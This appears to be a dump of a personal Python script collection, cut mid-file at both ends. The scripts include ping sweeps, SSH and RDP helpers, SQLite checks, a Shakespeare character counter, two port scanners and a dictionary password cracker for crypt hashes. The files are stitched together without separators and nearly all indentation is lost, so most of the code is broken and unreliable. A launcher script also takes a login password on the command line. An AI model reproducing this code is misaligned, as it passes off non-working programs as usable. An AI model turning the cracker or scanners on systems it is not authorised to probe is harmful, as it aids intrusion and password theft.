confdir = os.getenv("my_config") # Set the variable confdir from the OS environment variable - 1.3
conffile = ('daily_checks_servers.conf') # Set the variable conffile - 1.3
conffilename = os.path.join(confdir, conffile) # Set the variable conffilename by joining confdir and conffile together - 1.3
clear_screen() # Call the clear screen function
# The command below prints a little welcome message, as well as the script name, the date and time and where it was run from.
print ("Good Morning " + os.getenv('USERNAME') + ", "+
filename, "ran at", strftime("%Y-%m-%d %H:%M:%S"), "on",platform.node(), "run from",os.getcwd())
print_docs() # Call the print_docs function
    putty_sessions(conffilename)                        # Call the putty_sessions function, passing in the config file name
rdp_sessions() # Call the rdp_sessions function
euroclear_docs() # Call the euroclear_docs function
if __name__ == "__main__":
main()
import serial
import sys
#A serial port-scanner for linux and windows platforms
#Author: Julio César Echeverri Marulanda
#e-mail: [email protected]
#blog: blogdelingeniero1.wordpress.com
#You should have installed the PySerial module to use this method.
#You can install pyserial with the following line: pip install pyserial
def ListAvailablePorts():
#This function return a list containing the string names for Virtual Serial Ports
#availables in the computer (this function works only for Windows & Linux Platforms but you can extend it)
#if there isn't available ports, returns an empty List
AvailablePorts = []
platform = sys.platform
if platform == 'win32':
for i in range(255):
try:
ser = serial.Serial(i,9600)
except serial.serialutil.SerialException:
pass
else:
AvailablePorts.append(ser.portstr)
ser.close()
    elif platform.startswith('linux'):                  # sys.platform is 'linux2' on Python 2 and 'linux' on Python 3
for i in range(0,255):
try:
ser = serial.Serial('/dev/ttyUSB'+str(i))
except serial.serialutil.SerialException:
pass
else:
AvailablePorts.append('/dev/ttyUSB'+str(i))
ser.close()
else:
print '''This method was developed only for linux and windows
the current platform isn't recognised'''
return AvailablePorts
# EXAMPLE OF HOW IT WORKS
# if an Arduino is connected to the computer, the port will be shown in the terminal
# print ListAvailablePorts()
# Script Name : nslookup_check.py
# Author : Craig Richards
# Created : 5th January 2012
# Last Modified :
# Version : 1.0
# Modifications :
# Description : This very simple script opens the file server_list.txt and the does an nslookup for each one to check the DNS entry
import subprocess # Import the subprocess module
for server in open('server_list.txt'): # Open the file and read each line
    subprocess.Popen(('nslookup ' + server))    # Run the nslookup command for each server in the list
import pprint
info = '''SCENE I. Yorkshire. Gaultree Forest.
Enter the ARCHBISHOP OF YORK, MOWBRAY, LORD HASTINGS, and others
ARCHBISHOP OF YORK
What is this forest call'd?
HASTINGS
'Tis Gaultree Forest, an't shall please your grace.
ARCHBISHOP OF YORK
Here stand, my lords; and send discoverers forth
To know the numbers of our enemies.
HASTINGS
We have sent forth already.
ARCHBISHOP OF YORK
'Tis well done.
My friends and brethren in these great affairs,
I must acquaint you that I have received
New-dated letters from Northumberland;
Their cold intent, tenor and substance, thus:
Here doth he wish his person, with such powers
As might hold sortance with his quality,
The which he could not levy; whereupon
He is retired, to ripe his growing fortunes,
To Scotland: and concludes in hearty prayers
That your attempts may overlive the hazard
And fearful melting of their opposite.
MOWBRAY
Thus do the hopes we have in him touch ground
And dash themselves to pieces.
Enter a Messenger
HASTINGS
Now, what news?
Messenger
West of this forest, scarcely off a mile,
In goodly form comes on the enemy;
And, by the ground they hide, I judge their number
Upon or near the rate of thirty thousand.
MOWBRAY
The just proportion that we gave them out
Let us sway on and face them in the field.
ARCHBISHOP OF YORK
What well-appointed leader fronts us here?
Enter WESTMORELAND
MOWBRAY
I think it is my Lord of Westmoreland.
WESTMORELAND
Health and fair greeting from our general,
The prince, Lord John and Duke of Lancaster.
ARCHBISHOP OF YORK
Say on, my Lord of Westmoreland, in peace:
What doth concern your coming?
WESTMORELAND
Then, my lord,
Unto your grace do I in chief address
The substance of my speech. If that rebellion
Came like itself, in base and abject routs,
Led on by bloody youth, guarded with rags,
And countenanced by boys and beggary,
I say, if damn'd commotion so appear'd,
In his true, native and most proper shape,
You, reverend father, and these noble lords
Had not been here, to dress the ugly form
Of base and bloody insurrection
With your fair honours. You, lord archbishop,
Whose see is by a civil peace maintained,
Whose beard the silver hand of peace hath touch'd,
Whose learning and good letters peace hath tutor'd,
Whose white investments figure innocence,
The dove and very blessed spirit of peace,
Wherefore do you so ill translate ourself
Out of the speech of peace that bears such grace,
Into the harsh and boisterous tongue of war;
Turning your books to graves, your ink to blood,
Your pens to lances and your tongue divine
To a trumpet and a point of war?
ARCHBISHOP OF YORK
Wherefore do I this? so the question stands.
Briefly to this end: we are all diseased,
And with our surfeiting and wanton hours
Have brought ourselves into a burning fever,
And we must bleed for it; of which disease
Our late king, Richard, being infected, died.
But, my most noble Lord of Westmoreland,
I take not on me here as a physician,
Nor do I as an enemy to peace
Troop in the throngs of military men;
But rather show awhile like fearful war,
To diet rank minds sick of happiness
And purge the obstructions which begin to stop
Our very veins of life. Hear me more plainly.
I have in equal balance justly weigh'd
What wrongs our arms may do, what wrongs we suffer,
And find our griefs heavier than our offences.
We see which way the stream of time doth run,
And are enforced from our most quiet there
By the rough torrent of occasion;
And have the summary of all our griefs,
When time shall serve, to show in articles;
Which long ere this we offer'd to the king,
And might by no suit gain our audience:
When we are wrong'd and would unfold our griefs,
We are denied access unto his person
Even by those men that most have done us wrong.
The dangers of the days but newly gone,
Whose memory is written on the earth
With yet appearing blood, and the examples
Of every minute's instance, present now,
Hath put us in these ill-beseeming arms,
Not to break peace or any branch of it,
But to establish here a peace indeed,
Concurring both in name and quality.
WESTMORELAND
When ever yet was your appeal denied?
Wherein have you been galled by the king?
What peer hath been suborn'd to grate on you,
That you should seal this lawless bloody book
Of forged rebellion with a seal divine
And consecrate commotion's bitter edge?
ARCHBISHOP OF YORK
My brother general, the commonwealth,
To brother born an household cruelty,
I make my quarrel in particular.
WESTMORELAND
There is no need of any such redress;
Or if there were, it not belongs to you.
MOWBRAY
Why not to him in part, and to us all
That feel the bruises of the days before,
And suffer the condition of these times
To lay a heavy and unequal hand
Upon our honours?
WESTMORELAND
O, my good Lord Mowbray,
Construe the times to their necessities,
And you shall say indeed, it is the time,
And not the king, that doth you injuries.
Yet for your part, it not appears to me
Either from the king or in the present time
That you should have an inch of any ground
To build a grief on: were you not restored
To all the Duke of Norfolk's signories,
Your noble and right well remember'd father's?
MOWBRAY
What thing, in honour, had my father lost,
That need to be revived and breathed in me?
The king that loved him, as the state stood then,
Was force perforce compell'd to banish him:
And then that Harry Bolingbroke and he,
Being mounted and both roused in their seats,
Their neighing coursers daring of the spur,
Their armed staves in charge, their beavers down,
Their eyes of fire sparking through sights of steel
And the loud trumpet blowing them together,
Then, then, when there was nothing could have stay'd
My father from the breast of Bolingbroke,
O when the king did throw his warder down,
His own life hung upon the staff he threw;
Then threw he down himself and all their lives
That by indictment and by dint of sword
Have since miscarried under Bolingbroke.
WESTMORELAND
You speak, Lord Mowbray, now you know not what.
The Earl of Hereford was reputed then
In England the most valiant gentlemen:
Who knows on whom fortune would then have smiled?
But if your father had been victor there,
He ne'er had borne it out of Coventry:
For all the country in a general voice
Cried hate upon him; and all their prayers and love
Were set on Hereford, whom they doted on
And bless'd and graced indeed, more than the king.
But this is mere digression from my purpose.
Here come I from our princely general
To know your griefs; to tell you from his grace
That he will give you audience; and wherein
It shall appear that your demands are just,
You shall enjoy them, every thing set off
That might so much as think you enemies.
MOWBRAY
But he hath forced us to compel this offer;
And it proceeds from policy, not love.
WESTMORELAND
Mowbray, you overween to take it so;
This offer comes from mercy, not from fear:
For, lo! within a ken our army lies,
Upon mine honour, all too confident
To give admittance to a thought of fear.
Our battle is more full of names than yours,
Our men more perfect in the use of arms,
Our armour all as strong, our cause the best;
Then reason will our heart should be as good
Say you not then our offer is compell'd.
MOWBRAY
Well, by my will we shall admit no parley.
WESTMORELAND
That argues but the shame of your offence:
A rotten case abides no handling.
HASTINGS
Hath the Prince John a full commission,
In very ample virtue of his father,
To hear and absolutely to determine
Of what conditions we shall stand upon?
WESTMORELAND
That is intended in the general's name:
I muse you make so slight a question.
ARCHBISHOP OF YORK
Then take, my Lord of Westmoreland, this schedule,
For this contains our general grievances:
Each several article herein redress'd,
All members of our cause, both here and hence,
That are insinew'd to this action,
Acquitted by a true substantial form
And present execution of our wills
To us and to our purposes confined,
We come within our awful banks again
And knit our powers to the arm of peace.
WESTMORELAND
This will I show the general. Please you, lords,
In sight of both our battles we may meet;
And either end in peace, which God so frame!
Or to the place of difference call the swords
Which must decide it.
ARCHBISHOP OF YORK
My lord, we will do so.
Exit WESTMORELAND
MOWBRAY
There is a thing within my bosom tells me
That no conditions of our peace can stand.
HASTINGS
Fear you not that: if we can make our peace
Upon such large terms and so absolute
As our conditions shall consist upon,
Our peace shall stand as firm as rocky mountains.
MOWBRAY
Yea, but our valuation shall be such
That every slight and false-derived cause,
Yea, every idle, nice and wanton reason
Shall to the king taste of this action;
That, were our royal faiths martyrs in love,
We shall be winnow'd with so rough a wind
That even our corn shall seem as light as chaff
And good from bad find no partition.
ARCHBISHOP OF YORK
No, no, my lord. Note this; the king is weary
Of dainty and such picking grievances:
For he hath found to end one doubt by death
Revives two greater in the heirs of life,
And therefore will he wipe his tables clean
And keep no tell-tale to his memory
That may repeat and history his loss
To new remembrance; for full well he knows
He cannot so precisely weed this land
As his misdoubts present occasion:
His foes are so enrooted with his friends
That, plucking to unfix an enemy,
He doth unfasten so and shake a friend:
So that this land, like an offensive wife
That hath enraged him on to offer strokes,
As he is striking, holds his infant up
And hangs resolved correction in the arm
That was uprear'd to execution.
HASTINGS
Besides, the king hath wasted all his rods
On late offenders, that he now doth lack
The very instruments of chastisement:
So that his power, like to a fangless lion,
May offer, but not hold.
ARCHBISHOP OF YORK
'Tis very true:
And therefore be assured, my good lord marshal,
If we do now make our atonement well,
Our peace will, like a broken limb united,
Grow stronger for the breaking.
MOWBRAY
Be it so.
Here is return'd my Lord of Westmoreland.
Re-enter WESTMORELAND
WESTMORELAND
The prince is here at hand: pleaseth your lordship
To meet his grace just distance 'tween our armies.
MOWBRAY
Your grace of York, in God's name then, set forward.
ARCHBISHOP OF YORK
Before, and greet his grace: my lord, we come.
Exeunt'''
count = {}
for character in info.upper():
count[character] = count.get(character, 0) + 1
value = pprint.pformat(count)
print(value)
# Script Name : get_info_remoute_srv.py
# Author : Pavel Sirotkin
# Created : 3th April 2016
# Last Modified : -
# Version : 1.0.0
# Modifications :
# Description : this will get info about a remote server on Linux through an SSH connection. Connections to these servers must be made using keys
import subprocess
HOSTS = ('proxy1', 'proxy')
COMMANDS = ('uname -a', 'uptime')
for host in HOSTS:
result = []
for command in COMMANDS:
ssh = subprocess.Popen(["ssh", "%s" % host, command],
shell=False,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
result.append(ssh.stdout.readlines())
print('--------------- ' + host + ' --------------- ')
for res in result:
if not res:
print(ssh.stderr.readlines())
break
else:
            print(res)
# Script Name : portscanner.py
# Author : Craig Richards
# Created : 20 May 2013
# Last Modified :
# Version : 1.0
# Modifications :
# Description : Port Scanner, you just pass the host and the ports
import optparse # Import the module
from socket import * # Import the module
from threading import * # Import the module
screenLock = Semaphore(value=1)                         # Prevent other threads from proceeding
def connScan(tgtHost, tgtPort): # Start of the function
try:
connSkt = socket(AF_INET, SOCK_STREAM) # Open a socket
connSkt.connect((tgtHost, tgtPort))
connSkt.send('')
results=connSkt.recv(100)
screenLock.acquire() # Acquire the lock
print '[+] %d/tcp open'% tgtPort
print '[+] ' + str(results)
except:
screenLock.acquire()
print '[-] %d/tcp closed '% tgtPort
finally:
screenLock.release()
connSkt.close()
def portScan(tgtHost, tgtPorts): # Start of the function
try:
tgtIP = gethostbyname(tgtHost) # Get the IP from the hostname
except:
print "[-] Cannot resolve '%s': Unknown host"%tgtHost
return
try:
tgtName = gethostbyaddr(tgtIP) # Get hostname from IP
print '\n[+] Scan Results for: ' +tgtName[0]
except:
print '\n[+] Scan Results for: ' + tgtIP
setdefaulttimeout(1)
for tgtPort in tgtPorts: # Scan host and ports
t = Thread(target=connScan, args=(tgtHost, int(tgtPort)))
t.start()
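# Usage sketch (illustrative): scan two ports on a single host, e.g.
# python portscanner.py -H 192.168.1.10 -p 21,22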
def main():
parser = optparse.OptionParser('usage %prog -H'+' <target host> -p <target port>')
parser.add_option('-H', dest='tgtHost', type='string', help='specify target host')
    parser.add_option('-p', dest='tgtPort',type='string', help='specify target port[s] separated by a comma')
(options, args) = parser.parse_args()
tgtHost = options.tgtHost
tgtPorts = str(options.tgtPort).split(',')
if (tgtHost == None) | (tgtPorts[0] == None):
print parser.usage
exit(0)
portScan(tgtHost, tgtPorts)
if __name__ == '__main__':
    main()
# Script Name : work_connect.py
# Author : Craig Richards
# Created : 11th May 2012
# Last Modified : 31st October 2012
# Version : 1.1
# Modifications : 1.1 - CR - Added some extra code, to check an argument is passed to the script first of all, then check it's a valid input
# Description : This simple script loads everything I need to connect to work etc
import subprocess # Load the Library Module
import sys # Load the Library Module
import os # Load the Library Module
import time # Load the Library Module
dropbox = os.getenv("dropbox") # Set the variable dropbox, by getting the values of the environment setting for dropbox
rdpfile = ("remote\\workpc.rdp") # Set the variable logfile, using the arguments passed to create the logfile
conffilename=os.path.join(dropbox, rdpfile) # Set the variable conffilename by joining confdir and conffile together
remote = (r"c:\windows\system32\mstsc.exe ") # Set the variable remote with the path to mstsc
text = '''You need to pass an argument
-c Followed by login password to connect
-d to disconnect''' # Text to display if there is no argument passed or it's an invalid option - 1.2
if len(sys.argv) < 2: # Check there is at least one option passed to the script - 1.2
print text # If not print the text above - 1.2
sys.exit() # Exit the program - 1.2
if '-h' in sys.argv or '--h' in sys.argv or '-help' in sys.argv or '--help' in sys.argv: # Help Menu if called
print text # Print the text, stored in the text variable - 1.2
sys.exit(0) # Exit the program
else:
if sys.argv[1].lower().startswith('-c'): # If the first argument is -c then
passwd = sys.argv[2] # Set the variable passwd as the second argument passed, in this case my login password
subprocess.Popen((r"c:\Program Files\Checkpoint\Endpoint Connect\trac.exe connect -u username -p "+passwd))
subprocess.Popen((r"c:\geektools\puttycm.exe"))
time.sleep(15) # Sleep for 15 seconds, so the checkpoint software can connect before opening mstsc
subprocess.Popen([remote, conffilename])
elif sys.argv[1].lower().startswith('-d'): # If the first argument is -d then disconnect my checkpoint session.
subprocess.Popen((r"c:\Program Files\Checkpoint\Endpoint Connect\trac.exe disconnect "))
else:
        print 'Unknown option - ' + text        # If any other option is passed, then print Unknown option and the text from above - 1.2
# Script Name : testlines.py
# Author : Craig Richards
# Created : 08th December 2011
# Last Modified :
# Version : 1.0
# Modifications : beven nyamande
# Description : This very simple script opens a file and writes out whatever text is passed to it
def write_to_file(filename, txt):
with open(filename, 'w') as file_object:
s = file_object.write(txt)
if __name__ == '__main__':
write_to_file('test.txt', 'I am beven')
# Script Name : ping_subnet.py
# Author : Craig Richards
# Created : 12th January 2012
# Last Modified :
# Version : 1.0
# Modifications :
# Description : After supplying the first 3 octets it will scan the final range for available addresses
import os # Load the Library Module
import subprocess # Load the Library Module
import sys # Load the Library Module
filename = sys.argv[0] # Sets a variable for the script name
if '-h' in sys.argv or '--h' in sys.argv or '-help' in sys.argv or '--help' in sys.argv: # Help Menu if called
print '''
You need to supply the first octets of the address Usage : ''' + filename + ''' 111.111.111 '''
sys.exit(0)
else:
if (len(sys.argv) < 2): # If no arguments are passed then display the help and instructions on how to run the script
sys.exit (' You need to supply the first octets of the address Usage : ' + filename + ' 111.111.111')
subnet = sys.argv[1] # Set the variable subnet as the three octets you pass it
if os.name == "posix": # Check the os, if it's linux then
myping = "ping -c 2 " # This is the ping command
elif os.name in ("nt", "dos", "ce"): # Check the os, if it's windows then
myping = "ping -n 2 " # This is the ping command
f = open('ping_' + subnet + '.log', 'w') # Open a logfile
for ip in range(2,255): # Set the ip variable for the range of numbers
ret = subprocess.call(myping + str(subnet) + "." + str(ip) ,
shell=True, stdout=f, stderr=subprocess.STDOUT) # Run the command pinging the servers
if ret == 0: # Depending on the response
        f.write (subnet + "." + str(ip) + " is alive" + "\n")           # Write out that you can receive a response
    else:
        f.write (subnet + "." + str(ip) + " did not respond" + "\n")    # Write out you can't reach the box
# Script Name : ping_servers.py
# Author : Craig Richards
# Created : 9th May 2012
# Last Modified : 14th May 2012
# Version : 1.1
# Modifications : 1.1 - 14th May 2012 - CR Changed it to use the config directory to store the server files
# Description : This script will, depending on the arguments supplied will ping the servers associated with that application group.
import os # Load the Library Module
import subprocess # Load the Library Module
import sys # Load the Library Module
if '-h' in sys.argv or '--h' in sys.argv or '-help' in sys.argv or '--help' in sys.argv: # Help Menu if called
print '''
You need to supply the application group for the servers you want to ping, i.e.
dms
swaps
Followed by the site i.e.
155
bromley'''
sys.exit(0)
else:
    filename = sys.argv[0]                      # Sets a variable for the script name, needed for the usage message below
    if (len(sys.argv) < 3):                     # If no arguments are passed, display the help/instructions on how to run the script
        sys.exit ('\nYou need to supply the app group. Usage : ' + filename + ' followed by the application group i.e. \n \t dms or \n \t swaps \n then the site i.e. \n \t 155 or \n \t bromley')
appgroup = sys.argv[1] # Set the variable appgroup as the first argument you supply
site = sys.argv[2] # Set the variable site as the second argument you supply
if os.name == "posix": # Check the os, if it's linux then
myping = "ping -c 2 " # This is the ping command
elif os.name in ("nt", "dos", "ce"): # Check the os, if it's windows then
myping = "ping -n 2 " # This is the ping command
if 'dms' in sys.argv: # If the argument passed is dms then
appgroup = 'dms' # Set the variable appgroup to dms
elif 'swaps' in sys.argv: # Else if the argment passed is swaps then
appgroup = 'swaps' # Set the variable appgroup to swaps
if '155' in sys.argv: # If the argument passed is 155 then
site = '155' # Set the variable site to 155
elif 'bromley' in sys.argv: # Else if the argument passed is bromley
site = 'bromley' # Set the variable site to bromley
filename = sys.argv[0] # Sets a variable for the script name
logdir = os.getenv("logs") # Set the variable logdir by getting the OS environment logs
logfile = 'ping_' + appgroup + '_' + site + '.log' # Set the variable logfile, using the arguments passed to create the logfile
logfilename = os.path.join(logdir, logfile) # Set the variable logfilename by joining logdir and logfile together
confdir = os.getenv("my_config") # Set the variable confdir from the OS environment variable - 1.2
conffile = (appgroup + '_servers_' + site + '.txt') # Set the variable conffile - 1.2
conffilename = os.path.join(confdir, conffile) # Set the variable conffilename by joining confdir and conffile together - 1.2
f = open(logfilename, "w") # Open a logfile to write out the output
for server in open(conffilename): # Open the config file and read each line - 1.2
ret = subprocess.call(myping + server, shell=True, stdout=f, stderr=subprocess.STDOUT) # Run the ping command for each server in the list.
if ret == 0: # Depending on the response
f.write (server.strip() + " is alive" + "\n") # Write out that you can receive a reponse
else:
f.write (server.strip() + " did not respond" + "\n") # Write out you can't reach the box
print ("\n\tYou can see the results in the logfile : " + logfilename); # Show the location of the logfile# Script Name : backup_automater_services.py
# Author : Craig Richards
# Created : 24th October 2012
# Last Modified : 13th February 2016
# Version : 1.0.1
# Modifications : 1.0.1 - Tidy up the comments and syntax
# Description : This will go through and backup all my automator services workflows
import datetime # Load the library module
import os # Load the library module
import shutil # Load the library module
today = datetime.date.today() # Get Today's date
todaystr = today.isoformat() # Format it so we can use the format to create the directory
confdir = os.getenv("my_config") # Set the variable by getting the value from the OS setting
dropbox = os.getenv("dropbox") # Set the variable by getting the value from the OS setting
conffile = ('services.conf') # Set the variable as the name of the configuration file
conffilename = os.path.join(confdir, conffile) # Set the variable by combining the path and the file name
sourcedir = os.path.expanduser('~/Library/Services/') # Source directory of where the scripts are located
destdir = os.path.join(dropbox, "My_backups" + "/" +
"Automater_services" + todaystr + "/") # Combine several settings to create
# the destination backup directory
for file_name in open(conffilename): # Walk through the configuration file
fname = file_name.strip() # Strip out the blank lines from the configuration file
if fname: # For the lines that are not blank
sourcefile = os.path.join(sourcedir, fname) # Get the name of the source files to backup
destfile = os.path.join(destdir, fname) # Get the name of the destination file names
shutil.copytree(sourcefile, destfile) # Copy the directories
# Script Name : powerup_checks.py
# Author : Craig Richards
# Created : 25th June 2013
# Last Modified :
# Version : 1.0
# Modifications :
# Description : Creates an output file by pulling all the servers for the given site from a SQLite database, then pings each server in the list to see if it is up on the network
import sys # Load the Library Module
import sqlite3 # Load the Library Module
import os # Load the Library Module
import subprocess # Load the Library Module
from time import strftime # Load just the strftime Module from Time
dropbox=os.getenv("dropbox") # Set the variable, by getting the value of the variable from the OS
config=os.getenv("my_config") # Set the variable, by getting the value of the variable from the OS
dbfile=("Databases/jarvis.db") # Set the variable to the database
master_db=os.path.join(dropbox, dbfile) # Create the variable by linking the path and the file
listfile=("startup_list.txt") # File that will hold the servers
serverfile=os.path.join(config,listfile) # Create the variable by linking the path and the file
outputfile=('server_startup_'+strftime("%Y-%m-%d-%H-%M")+'.log')
# Below is the help text
text = '''
You need to pass an argument, the options the script expects is
-site1 For the Servers relating to site1
-site2 For the Servers located in site2'''
def windows(): # This is the function to run if it detects the OS is windows.
f = open(outputfile, 'a') # Open the logfile
for server in open(serverfile,'r'): # Read the list of servers from the list
#ret = subprocess.call("ping -n 3 %s" % server.strip(), shell=True,stdout=open('NUL', 'w'),stderr=subprocess.STDOUT) # Ping the servers in turn
ret = subprocess.call("ping -n 3 %s" % server.strip(),stdout=open('NUL', 'w'),stderr=subprocess.STDOUT) # Ping the servers in turn
if ret == 0: # Depending on the response
f.write ("%s: is alive" % server.strip().ljust(15) + "\n") # Write out to the logfile is the server is up
else:
f.write ("%s: did not respond" % server.strip().ljust(15) + "\n") # Write to the logfile if the server is down
def linux(): # This is the function to run if it detects the OS is nix.
f = open(outputfile, 'a') # Open the same logfile that main() reports at the end
for server in open(serverfile,'r'): # Read the list of servers from the list
ret = subprocess.call("ping -c 3 %s" % server, shell=True,stdout=open('/dev/null', 'w'),stderr=subprocess.STDOUT) # Ping the servers in turn
if ret == 0: # Depending on the response
f.write ("%s: is alive" % server.strip().ljust(15) + "\n") # Write out to the logfile is the server is up
else:
f.write ("%s: did not respond" % server.strip().ljust(15) + "\n") # Write to the logfile if the server is down
def get_servers(query): # Function to get the servers from the database
conn = sqlite3.connect(master_db) # Connect to the database
cursor = conn.cursor() # Create the cursor
cursor.execute('select hostname from tp_servers where location =?',(query,)) # SQL Statement
print ('\nDisplaying Servers for : ' + query + '\n')
f = open(serverfile, 'a') # Open the serverfile once, before the loop
while True: # While there are results
row = cursor.fetchone() # Return the results
if row is None:
break
f.write("%s\n" % str(row[0])) # Write the server out to the file
print row[0] # Display the server to the screen
f.close() # Close the file once all rows are written
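# The query above assumes a table roughly like the (hypothetical) schema below;
# the real definition lives inside jarvis.db and is not shown here:
#   CREATE TABLE tp_servers (hostname TEXT, location TEXT);
# A quick way to seed a throwaway database for testing this function:
#   import sqlite3
#   conn = sqlite3.connect('jarvis.db')
#   conn.execute("CREATE TABLE tp_servers (hostname TEXT, location TEXT)")
#   conn.execute("INSERT INTO tp_servers VALUES ('web01', 'site1')")
#   conn.commit()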
def main(): # Main Function
if os.path.exists(serverfile): # Checks to see if there is an existing server file
os.remove(serverfile) # If so remove it
if len(sys.argv) < 2: # Check there is an argument being passed
print text # Display the help text if there isn't one passed
sys.exit() # Exit the script
if '-h' in sys.argv or '--h' in sys.argv or '-help' in sys.argv or '--help' in sys.argv: # If they ask for help
print text # Display the help text
sys.exit(0) # Exit the script after displaying help
else:
if sys.argv[1].lower().startswith('-site1'): # If the argument is site1
query = 'site1' # Set the variable to have the value site1
elif sys.argv[1].lower().startswith('-site2'): # Else if the argument is site2
query = 'site2' # Set the variable to have the value site2
else:
print '\n[-] Unknown option [-] ' + text # If an unknown option is passed, let the user know
sys.exit(0)
get_servers(query) # Call the get servers function, with the value from the argument
if os.name == "posix": # If the OS is linux.
linux() # Call the linux function
elif os.name in ("nt", "dos", "ce"): # If the OS is Windows...
windows() # Call the windows function
print ('\n[+] Check the log file ' + outputfile + ' [+]\n') # Display the name of the log
if __name__ == '__main__':
main() # Call the main function
# Script Name : password_cracker.py
# Author : Craig Richards
# Created : 20 May 2013
# Last Modified :
# Version : 1.0
# Modifications :
# Description : Old school password cracker using python
from sys import platform as _platform
# Check the current operating system to import the correct version of crypt
if _platform in ["linux", "linux2", "darwin"]: # darwin is _platform name for Mac OS X
import crypt # Import the module
elif _platform == "win32":
# Windows
try:
import fcrypt # Try importing the fcrypt module
except ImportError:
print 'Please install fcrypt if you are on Windows'
def testPass(cryptPass): # Start the function
salt = cryptPass[0:2]
dictFile = open('dictionary.txt','r') # Open the dictionary file
for word in dictFile.readlines(): # Scan through the file
word = word.strip('\n')
cryptWord = crypt.crypt(word, salt) # Check for password in the file
if (cryptWord == cryptPass):
print "[+] Found Password: "+word+"\n"
return
print "[-] Password Not Found.\n"
return
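# For reference, the same crypt call can generate a test entry; the 'egg'/'HX'
# pair below is the classic example from the Python crypt docs:
#   import crypt
#   print crypt.crypt('egg', 'HX') # -> 'HX9LLTdc/jiDE'
# so a passwords.txt line of victim:HX9LLTdc/jiDE cracks if 'egg' is in dictionary.txt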
def main():
passFile = open('passwords.txt') # Open the password file
for line in passFile.readlines(): # Read through the file
if ":" in line:
user = line.split(':')[0]
cryptPass = line.split(':')[1].strip(' ') # Prepare the user name etc
print "[*] Cracking Password For: " + user
testPass(cryptPass) # Call it to crack the users password
if __name__ == "__main__":
main()
# Script Name : check_file.py
# Author : Craig Richards
# Created : 20 May 2013
# Last Modified :
# Version : 1.0
# Modifications : with statement added to ensure correct file closure
# Description : Check a file exists and that we can read the file
from __future__ import print_function
import sys # Import the Modules
import os # Import the Modules
# Prints usage if not appropriate length of arguments are provided
def usage():
print('[-] Usage: python check_file.py <filename1> [filename2] ... [filenameN]')
exit(0)
# Readfile Functions which open the file that is passed to the script
def readfile(filename):
with open(filename, 'r') as f: # Ensure file is correctly closed under all circumstances
line = f.read()
print(line)
def main():
if len(sys.argv) >= 2: # Check the arguments passed to the script
filenames = sys.argv[1:]
for filename in filenames: # Iterate for each filename passed in command line argument
if not os.path.isfile(filename): # Check the File exists
print ('[-] ' + filename + ' does not exist.')
filenames.remove(filename) #remove non existing files from filenames list
continue
if not os.access(filename, os.R_OK): # Check you can read the file
print ('[-] ' + filename + ' access denied')
filenames.remove(filename) # remove non readable filenames
continue
else:
usage() # Print usage if not all parameters passed/Checked
# Read the content of each file
for filename in filenames:
print ('[+] Reading from : ' + filename) # Display Message and read the file contents
readfile(filename)
if __name__ == '__main__':
main()
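# Example invocation (hypothetical filenames):
#   python check_file.py notes.txt data.csv
# prints '[+] Reading from : <name>' plus the contents for each readable file,
# and a '[-] ... does not exist.' or '[-] ... access denied' line otherwise.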
# Script Name : nmap_scan.py
# Author : Craig Richards
# Created : 24th May 2013
# Last Modified :
# Version : 1.0
# Modifications :
# Description : Performs a simple nmap port scan of the supplied host and ports, you need nmap and the python-nmap module installed to run this
import nmap # Import the module
import optparse # Import the module
def nmapScan(tgtHost, tgtPort): # Create the function, this function does the scanning
nmScan = nmap.PortScanner()
nmScan.scan(tgtHost, tgtPort)
state = nmScan[tgtHost]['tcp'][int(tgtPort)]['state']
print "[*] " + tgtHost + " tcp/" + tgtPort + " " + state
def main(): # Main Program
parser = optparse.OptionParser('usage%prog ' + '-H <host> -p <port>') # Display options/help if required
parser.add_option('-H', dest='tgtHost', type='string', help='specify host')
parser.add_option('-p', dest='tgtPort', type='string', help='port')
(options, args) = parser.parse_args()
tgtHost = options.tgtHost
tgtPorts = str(options.tgtPort).split(',')
if (tgtHost is None) or (options.tgtPort is None):
print parser.usage
exit(0)
for tgtPort in tgtPorts: # Scan the hosts with the ports etc
nmapScan(tgtHost, tgtPort)
if __name__ == '__main__':
main()
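# Example invocation (hypothetical host and ports):
#   python nmap_scan.py -H 192.168.0.10 -p 21,22,80
# prints one '[*] <host> tcp/<port> <state>' line per port scanned.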
import urllib2
try:
urllib2.urlopen("http://google.com", timeout=2)
print ("working connection")
except urllib2.URLError:
print ("No internet connection")# Script Name : sqlite_check.py
# Author : Craig Richards
# Created : 20 May 2013
# Last Modified :
# Version : 1.0
# Modifications :
# Description : Runs checks to check my SQLITE database
import sqlite3 as lite
import sys
import os
dropbox= os.getenv("dropbox")
dbfile=("Databases\jarvis.db")
master_db=os.path.join(dropbox, dbfile)
con = None
try:
con = lite.connect(master_db)
cur = con.cursor()
cur.execute('SELECT SQLITE_VERSION()')
data = cur.fetchone()
print "SQLite version: %s" % data
except lite.Error, e:
print "Error %s:" % e.args[0]
sys.exit(1)
finally:
if con:
con.close()
con = lite.connect(master_db)
cur=con.cursor()
cur.execute("SELECT name FROM sqlite_master WHERE type='table'")
rows = cur.fetchall()
for row in rows:
print row
con = lite.connect(master_db)
cur=con.cursor()
cur.execute("SELECT name FROM sqlite_master WHERE type='table'")
while True:
row = cur.fetchone()
if row is None:
break
print row[0]
import pygame, sys, time
from pygame.locals import *
pygame.init()
window = pygame.display.set_mode((400, 300), 0, 32)
pygame.display.set_caption("Shape")
WHITE = (255, 255, 255)
GREEN = ( 0, 255, 0)
window.fill(WHITE)
pygame.draw.polygon(window, GREEN, ((146, 0), (236, 277), (56, 277)))
# Game logic
while True:
for event in pygame.event.get():
if event.type == QUIT:
pygame.quit()
sys.exit()
pygame.display.update()
# Script Name : fileinfo.py
# Author : Not sure where I got this from
# Created : 28th November 2011
# Last Modified :
# Version : 1.0
# Modifications :
# Description : Show file information for a given file
# get file information using os.stat()
# tested with Python24 vegsaeat 25sep2006
from __future__ import print_function
import os
import sys
import stat # index constants for os.stat()
import time
try_count = 16
while try_count:
file_name = raw_input("Enter a file name: ") # pick a file you have
try_count >>= 1
try:
file_stats = os.stat(file_name)
break
except OSError:
print ("\nNameError : [%s] No such file or directory\n", file_name)
if try_count == 0:
print ("Trial limit exceded \nExiting program")
sys.exit()
# create a dictionary to hold file info
file_info = {
'fname': file_name,
'fsize': file_stats[stat.ST_SIZE],
'f_lm' : time.strftime("%d/%m/%Y %I:%M:%S %p",
time.localtime(file_stats[stat.ST_MTIME])),
'f_la' : time.strftime("%d/%m/%Y %I:%M:%S %p",
time.localtime(file_stats[stat.ST_ATIME])),
